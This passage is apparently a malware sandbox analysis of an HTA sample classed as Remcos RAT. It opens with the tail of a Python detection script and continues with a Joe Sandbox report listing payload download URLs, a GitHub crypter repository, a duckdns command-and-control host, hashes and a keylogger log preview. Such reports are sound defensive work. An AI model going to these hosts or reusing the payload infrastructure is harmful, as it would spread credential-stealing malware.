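    {"pid": 15, "dst_host": "192.3.220.40",              "dst_port": 80},
    {"pid": 35, "dst_host": "raw.githubusercontent.com", "dst_port": 443},
    {"pid": 41, "dst_host": "idabo.duckdns.org",         "dst_port": 6875},
    {"pid": 41, "dst_host": "geoplugin.net",             "dst_port": 80},
]
MUTEXES = [{"pid": 41, "name": r"\Sessions\1\BaseNamedObjects\Rmc-I89M3S"}]

if __name__ == "__main__":
    for pid, lineage in chain_findings(PROCS):
        print(f"suspicious lineage (pid {pid}): {lineage}")
    for pid, image, dst, reasons in network_findings(CONNS, PROCS):
        print(f"suspicious connection (pid {pid}, {image}) -> {dst}: {'; '.join(reasons)}")
    for pid, name in mutex_findings(MUTEXES):
        print(f"Remcos-style mutex (pid {pid}): {name}")
```

The lineage check fires only on the process that completes a suspicious edge, so a six-deep chain yields one finding per bad edge rather than one per descendant; csc.exe under powershell.exe is deliberately not in the edge set because Add-Type compiles that way legitimately, and the report's "Dot net compiler compiles file from suspicious location" signature is the better discriminator for it.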

Antivirus detection

Initial sample (Source | Detection | Scanner)
na.hta | 27% | Virustotal

Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches

Domains (Source | Detection | Scanner)
raw.githubusercontent.com | 0% | Virustotal
geoplugin.net | 0% | Virustotal
idabo.duckdns.org | 2% | Virustotal
URLs (Source | Detection | Scanner | Label)
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://aka.ms/winsvr-2022-pshelp | 0% | URL Reputation | safe
http://www.imvu.comr | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
http://www.imvu.com | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://go.micros | 0% | URL Reputation | safe
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
http://crl.micro | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://login.yahoo.com/config/login | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://www.ebuddy.com | 0% | URL Reputation | safe
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg | 4% | Virustotal |
http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIF | 4% | Virustotal |
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgt | 0% | Virustotal |
http://192.3.220.40/ | 0% | Virustotal |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
http://192.3.220.40 | 0% | Virustotal |
https://www.google.com | 0% | Virustotal |
https://github.com/Pester/Pester | 1% | Virustotal |
http://www.nirsoft.net | 0% | Virustotal |
http://geoplugin.net/json.gphy | 0% | Virustotal |
http://192.3.220.40/450/RRFCCE.txt | 4% | Virustotal |
https://raw.githubusercontent.com | 0% | Virustotal |
https://www.google.com/accounts/servicelogin | 0% | Virustotal |
http://192.3.220.40/450/seethebe | 4% | Virustotal |
idabo.duckdns.org | 2% | Virustotal |
http://www.nirsoft.net/ | 0% | Virustotal |
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
raw.githubusercontent.com | 185.199.111.133 | true | true | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
idabo.duckdns.org | 135.148.195.248 | true | true | | unknown

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIF | true | | unknown
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg | true | | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
http://192.3.220.40/450/RRFCCE.txt | true | | unknown
idabo.duckdns.org | true | | unknown
URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation)
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.2132026884.0000000006008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2063385323.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.2060949985.00000000047D7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://192.3.220.40/ | powershell.exe, 00000001.00000002.2137672850.0000000007BD4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://geoplugin.net/json.gpur | RegAsm.exe, 0000000B.00000002.4471996980.00000000013FF000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.imvu.comr | RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgt | powershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://192.3.220.40 | powershell.exe, 00000009.00000002.2235977032.00000000047E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2235977032.0000000004735000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFs | powershell.exe, 00000001.00000002.2118359781.00000000035F1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2279258248.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://192.3.24: | powershell.exe, 00000009.00000002.2235977032.00000000047E3000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.2060949985.00000000047D7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2279258248.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000001.00000002.2119899349.00000000056A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2235977032.0000000004D36000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFrosoft | powershell.exe, 00000001.00000002.2137672850.0000000007AF3000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/License | powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gphy | RegAsm.exe, 0000000B.00000002.4471996980.00000000013FF000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.imvu.com | RegAsm.exe, RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.nirsoft.net | RegAsm.exe, 0000000C.00000002.2251250013.0000000000BF4000.00000004.00000010.00020000.00000000.sdmp | false | | unknown
http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFPG | powershell.exe, 00000001.00000002.2137672850.0000000007AF3000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://go.micros | powershell.exe, 00000003.00000002.2060949985.0000000004DBD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2279258248.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
https://www.google.com | RegAsm.exe, RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFvu | powershell.exe, 00000001.00000002.2118359781.00000000035F1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.micro | powershell.exe, 00000001.00000002.2137672850.0000000007B8B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercontent.com | powershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://geoplugin.net/json.gp/C | powershell.exe, 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000001.00000002.2119899349.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2060949985.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2354881684.0000000005208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2354881684.00000000051F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2235977032.00000000044B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFGm | powershell.exe, 00000001.00000002.2137672850.0000000007AF3000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://192.3.220.40/450/RRFCP | powershell.exe, 00000009.00000002.2235977032.00000000047E3000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.2060949985.00000000047D7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.2132026884.0000000006008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2063385323.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/accounts/servicelogin | RegAsm.exe | false | | unknown
https://login.yahoo.com/config/login | RegAsm.exe | false | URL Reputation: safe | unknown
http://www.nirsoft.net/ | RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.2119899349.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2060949985.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2354881684.0000000005208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2235977032.00000000044B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://192.3.220.40/450/seethebe | powershell.exe, 00000001.00000002.2119899349.00000000050F7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://geoplugin.net/json.gpRr& | RegAsm.exe, 0000000B.00000002.4471996980.00000000013FF000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.ebuddy.com | RegAsm.exe, RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
135.148.195.248 | idabo.duckdns.org | United States | 18676 | AVAYAUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
192.3.220.40 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
185.199.111.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1533059
Start date and time: 2024-10-14 11:35:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 5s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: na.hta
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winHTA@27/23@4/4
EGA Information:
• Successful, ratio: 55.6%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 184
• Number of non-executed functions: 321
Cookbook Comments:
• Found application associated with file extension: .hta
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 3788 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 2228 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 3812 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 3840 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:35:56 | API Interceptor | 106x Sleep call for process: powershell.exe modified
05:36:45 | API Interceptor | 7043493x Sleep call for process: RegAsm.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
135.148.195.248 | 037002451082_10142024.xls | malicious | Remcos |
135.148.195.248 | QPS-36477.xls | malicious | Remcos |
135.148.195.248 | DHL Shipment Doc's.xls | malicious | Remcos |
135.148.195.248 | PO-00536.xls | malicious | Remcos |
135.148.195.248 | gwfe4fo1Sp.rtf | malicious | Remcos, PureLog Stealer |
135.148.195.248 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.22755.22546.rtf | malicious | Remcos, PureLog Stealer |
135.148.195.248 | SecuriteInfo.com.Trojan-Downloader.Office.Doc.20731.18439.xlsx | malicious | Remcos, PureLog Stealer |
135.148.195.248 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.3511.17688.rtf | malicious | Remcos |
135.148.195.248 | QPS366349.xls | malicious | Remcos |
135.148.195.248 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.13950.5767.rtf | malicious | Remcos |
178.237.33.50 | DHL_Shipping_Invoices_Awb_0000000.vbs | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 037002451082_10142024.xls | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Custom Export Tax Recovery Form.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | Salary Increase Letter_Oct 2024.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | WC5Gv13cOQ.rtf | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | BeeaCHpaO4.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | na.rtf | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | PO-00006799868.xls | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | STATEMENT - PAYMENT TRACKING Sept 2024.docx.doc | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsf | malicious | Remcos, GuLoader | geoplugin.net/json.gp
192.3.220.40 | 037002451082_10142024.xls | malicious | Remcos | 192.3.220.40/450/RRFCCE.txt
192.3.220.40 | na.hta | malicious | Cobalt Strike | 192.3.220.40/330/verybestthingswesharedfornew.tIF
192.3.220.40 | QPS-36477.xls | malicious | Remcos | 192.3.220.40/330/RRCGGH.txt
Match | Associated Sample Name / URL | Detection | Threat Name | Context
raw.githubusercontent.com | 037002451082_10142024.xls | malicious | Remcos | 185.199.108.133
raw.githubusercontent.com | SecuriteInfo.com.Win32.MalwareX-gen.4146.6049.exe | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | SecuriteInfo.com.Win32.MalwareX-gen.17953.1345.exe | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | SecuriteInfo.com.Win32.MalwareX-gen.4146.6049.exe | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exe | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | SecuriteInfo.com.Win32.MalwareX-gen.17953.1345.exe | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | 20062024150836 11.10.2024.vbe | malicious | Snake Keylogger, VIP Keylogger | 185.199.108.133
raw.githubusercontent.com | STATEMENT - PAYMENT TRACKING Sept 2024.docx.doc | malicious | Remcos | 185.199.108.133
raw.githubusercontent.com | facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsx | malicious | AgentTesla | 185.199.110.133
raw.githubusercontent.com | Orden de Compra 097890.xlam.xlsx | malicious | AgentTesla | 185.199.108.133
idabo.duckdns.org | 037002451082_10142024.xls | malicious | Remcos | 135.148.195.248
idabo.duckdns.org | QPS-36477.xls | malicious | Remcos | 135.148.195.248
idabo.duckdns.org | DHL Shipment Doc's.xls | malicious | Remcos | 135.148.195.248
idabo.duckdns.org | PO-00536.xls | malicious | Remcos | 135.148.195.248
geoplugin.net | DHL_Shipping_Invoices_Awb_0000000.vbs | malicious | Remcos | 178.237.33.50
geoplugin.net | 037002451082_10142024.xls | malicious | Remcos | 178.237.33.50
geoplugin.net | Custom Export Tax Recovery Form.vbs | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | Salary Increase Letter_Oct 2024.vbs | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | WC5Gv13cOQ.rtf | malicious | Remcos | 178.237.33.50
geoplugin.net | BeeaCHpaO4.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | na.rtf | malicious | Remcos | 178.237.33.50
geoplugin.net | PO-00006799868.xls | malicious | Remcos | 178.237.33.50
geoplugin.net | STATEMENT - PAYMENT TRACKING Sept 2024.docx.doc | malicious | Remcos | 178.237.33.50
geoplugin.net | narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsf | malicious | Remcos, GuLoader | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AVAYAUS | 037002451082_10142024.xls | malicious | Remcos | 135.148.195.248
AVAYAUS | na.elf | malicious | Mirai | 135.150.73.84
AVAYAUS | 0aEXGHNxhO.elf | malicious | Mirai, Okiru | 135.64.195.28
AVAYAUS | vEOTtk6FeG.elf | malicious | Mirai | 198.157.41.196
AVAYAUS | 2NkFwDDoDy.elf | malicious | Mirai | 135.80.118.106
AVAYAUS | na.elf | malicious | Mirai | 135.98.84.251
AVAYAUS | na.elf | malicious | Unknown | 135.150.97.43
AVAYAUS | na.elf | malicious | Mirai | 135.83.183.50
AVAYAUS | QPS-36477.xls | malicious | Remcos | 135.148.195.248
AVAYAUS | na.elf | malicious | Mirai | 135.122.218.20
FASTLYUS | https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_A | malicious | Unknown | 151.101.129.229
FASTLYUS | 037002451082_10142024.xls | malicious | Remcos | 185.199.108.133
FASTLYUS | https://emojiparqueacuaticoo.site/NClMD/ | malicious | HTMLPhisher | 151.101.130.137
FASTLYUS | https://narrow-light-alley.glitch.me/public/40.htm | malicious | HTMLPhisher | 151.101.194.137
FASTLYUS | Request For Quotation.js | malicious | STRRAT | 199.232.196.209
FASTLYUS | https://r.clk20.com/s.ashx?ms=clk20comb:221053_100505&e=ACCOUNTING%40SBO.CO.AT&eId=72534635&c=h&url=https%3a%2f%2fwww.digikey.at%3futm_medium%3demail%26utm_source%3dcsn%26utm_campaign%3dclk20comb:221053-100505_CSN24CMM1%26utm_content%3dDigiKeyLogo_AT%26utm_cid%3d&c=E,1,HpCcAtsbpCegpKKqJ9Y5uFcA_ydFOa8bwbyPDmQPWZrYVAHSEO4EBUFk2oBVcoOSlhj1U-BBO3hqrTRAz1S8XP6noRCD2_d6D_dY_HcwfLi_OKAuOxCdCkg,&typo=1 | malicious | Unknown | 151.101.0.114
FASTLYUS | https://www.kwconnect.com/redirect?url=https://www.lugiest.com/sqx/#Xem9lLmdyYWhhbUBjeWJnLmNvbQ== | malicious | HTMLPhisher | 151.101.194.137
FASTLYUS | https://tracking.ei9ie7ph.com/aff_c?offer_id=14263&aff_id=2&source=testoffer&aff_sub=testoffer | malicious | Unknown | 151.101.65.108
FASTLYUS | 3Af7PybsUi.exe | malicious | Unknown | 151.101.0.223
FASTLYUS | 3Af7PybsUi.exe | malicious | Unknown | 151.101.128.223
AS-COLOCROSSINGUS | 037002451082_10142024.xls | malicious | Remcos | 192.3.220.40
AS-COLOCROSSINGUS | na.hta | malicious | Cobalt Strike | 192.3.220.40
AS-COLOCROSSINGUS | na.elf | malicious | Unknown | 192.3.165.37
AS-COLOCROSSINGUS | na.elf | malicious | Unknown | 192.3.165.37
AS-COLOCROSSINGUS | sB2ClgrGng.exe | malicious | Blank Grabber, XWorm | 198.23.219.104
AS-COLOCROSSINGUS | na.elf | malicious | Unknown | 192.3.165.37
AS-COLOCROSSINGUS | WC5Gv13cOQ.rtf | malicious | Remcos | 107.173.4.16
AS-COLOCROSSINGUS | uSE8AyujGn.elf | malicious | Mirai | 104.170.120.236
AS-COLOCROSSINGUS | na.elf | malicious | Mirai | 198.12.122.175
AS-COLOCROSSINGUS | BeeaCHpaO4.exe | malicious | Remcos | 107.173.4.16
ATOM86-ASATOM86NL | DHL_Shipping_Invoices_Awb_0000000.vbs | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 037002451082_10142024.xls | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Custom Export Tax Recovery Form.vbs | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | Salary Increase Letter_Oct 2024.vbs | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | WC5Gv13cOQ.rtf | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | BeeaCHpaO4.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | na.rtf | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | PO-00006799868.xls | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | STATEMENT - PAYMENT TRACKING Sept 2024.docx.doc | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsf | malicious | Remcos, GuLoader | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | https://redealmucusin.uk/ | malicious | Unknown | 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | DHL_Shipping_Invoices_Awb_0000000.vbs | malicious | Remcos | 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs | malicious | PureLog Stealer, zgRAT | 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | EQORY0083009.vbs | malicious | AgentTesla | 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | Snvlerier.exe | malicious | GuLoader, Snake Keylogger | 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | 3Af7PybsUi.exe | malicious | Unknown | 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | 3Af7PybsUi.exe | malicious | Unknown | 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | Snvlerier.exe | malicious | GuLoader, Snake Keylogger | 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | ASL OTSL 2 ship's Particulars.xlsx.exe | malicious | AgentTesla, PureLog Stealer | 185.199.111.133
No context
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type: data
Category: dropped
Size (bytes): 144
Entropy (8bit): 3.38816599775145
Encrypted: false
SSDEEP: 3:rhlKlM+UlRl+WlpFNqlDl5JWRal2Jl+7R0DAlBG45klovDl6v:6ly0WrF4b5YcIeeDAlOWAv
MD5: 76B0003B48DE3FA8602CCEF87010BD89
SHA1: 30CAE1408803E1B65FBF43050A59961EEDCF6F42
SHA-256: 3A6DDB92CB546C7BDBDCC2E921BF080C1FFF65C9F09C55BA727496576D73C1F8
SHA-512: 6E7B38C9064136E7EC34231DBC5BDDFFD9610E98047E418B4E6287B1BD9C0347808FC3DFD72C28EAB86C3348A551E9DDCE932C22ECAE9FDEDD898879E47D4927
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview: ....[.2.0.2.4./.1.0./.1.4. .0.5.:.3.6.:.1.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type: JSON data
Category: dropped
Size (bytes): 962
Entropy (8bit): 5.013130376969173
Encrypted: false
SSDEEP: 12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
MD5: F61E5CC20FBBA892FF93BFBFC9F41061
SHA1: 36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
SHA-256: 28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
SHA-512: 5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
Malicious: false
Preview: {. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
